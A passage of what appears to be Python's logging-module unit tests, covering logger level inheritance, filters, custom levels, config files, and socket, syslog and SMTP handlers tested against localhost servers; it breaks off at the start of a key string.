m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except socket.error: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
old_stderr = sys.stderr
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
sys.stderr = sio = io.StringIO()
h.handle(r)
self.assertIn('\nRuntimeError: deliberate mistake\n',
sio.getvalue())
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
h.handle(r)
self.assertEqual('', sio.getvalue())
finally:
logging.raiseExceptions = old_raise
sys.stderr = old_stderr
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPChannel(smtpd.SMTPChannel):
"""
This derived class has had to be created because smtpd does not
support use of custom channel maps, although they are allowed by
asyncore's design. Issue #11959 has been raised to address this,
and if resolved satisfactorily, some of this code can be removed.
"""
def __init__(self, server, conn, addr, sockmap):
asynchat.async_chat.__init__(self, conn, sockmap)
self.smtp_server = server
self.conn = conn
self.addr = addr
self.data_size_limit = None
self.received_lines = []
self.smtp_state = self.COMMAND
self.seen_greeting = ''
self.mailfrom = None
self.rcpttos = []
self.received_data = ''
self.fqdn = socket.getfqdn()
self.num_bytes = 0
try:
self.peer = conn.getpeername()
except socket.error as err:
# a race condition may occur if the other end is closing
# before we can get the peername
self.close()
if err.args[0] != errno.ENOTCONN:
raise
return
self.push('220 %s %s' % (self.fqdn, smtpd.__version__))
self.set_terminator(b'\r\n')
self.extended_smtp = False
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
channel_class = TestSMTPChannel
def __init__(self, addr, handler, poll_interval, sockmap):
self._localaddr = addr
self._remoteaddr = None
self.data_size_limit = None
self.sockmap = sockmap
asyncore.dispatcher.__init__(self, map=sockmap)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
self.set_socket(sock, map=sockmap)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(addr)
self.port = sock.getsockname()[1]
self.listen(5)
except:
self.close()
raise
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def handle_accepted(self, conn, addr):
"""
Redefined only because the base class does not pass in a
map, forcing use of a global in :mod:`asyncore`.
"""
channel = self.channel_class(self, conn, addr, self.sockmap)
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self.sockmap)
except select.error:
# On FreeBSD 8, closing the server repeatably
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except socket.error as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except socket.error:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
def test_basic(self):
sockmap = {}
server = TestSMTPServer(('localhost', 0), self.process_message, 0.001,
sockmap)
server.start()
addr = ('localhost', server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log', timeout=5.0)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(5.0) # 14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestTCPServer(addr, self.handle_socket,
0.01)
server.start()
server.ready.wait()
self.sock_hdlr = logging.handlers.SocketHandler('localhost',
server.port)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Kill the server
self.server.stop(2.0)
#The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertTrue(self.sock_hdlr.retryTime > now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestUDPServer(addr, self.handle_datagram, 0.01)
server.start()
server.ready.wait()
self.sock_hdlr = logging.handlers.DatagramHandler('localhost',
server.port)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestUDPServer(addr, self.handle_datagram,
0.01)
server.start()
server.ready.wait()
self.sl_hdlr = logging.handlers.SysLogHandler(('localhost',
server.port))
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
PEMFILE = """-----BEGIN RSA PRIVATE KEY-----
